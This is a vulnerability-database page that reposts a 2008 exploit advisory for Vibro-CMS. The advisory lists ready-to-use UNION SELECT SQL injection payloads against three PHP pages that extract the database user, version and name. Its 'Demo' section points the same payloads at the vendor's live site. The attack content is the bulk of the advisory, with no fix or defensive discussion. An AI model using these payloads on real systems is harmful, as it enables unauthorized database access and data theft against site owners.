Lucene search

vibrocms-sql.txt

🗓️ 04 Nov 2008 00:00:00Reported by StAkeRType

packetstorm🔗 packetstormsecurity.com👁 22 Views

Vibro-CMS Multiple Remote SQL Injection Vulnerabilities discovered by StAkeR

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`/*  
-------------------------------------------------------  
Vibro-CMS Multiple Remote SQL Injection Vulnerabilities  
-------------------------------------------------------  
Discovered By StAkeR[at]hotmail[dot]it  
http://www.niclor.net/prodotti/Vibro-CMS  
-------------------------------------------------------  
  
* Remote SQL Injection  
* Note: Works Regardless PHP.ini Settings  
  
- view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*  
- view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*  
- view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*  
  
* Demo  
  
- http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*  
- http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*  
- http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*  
  
  
  
*/  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

04 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4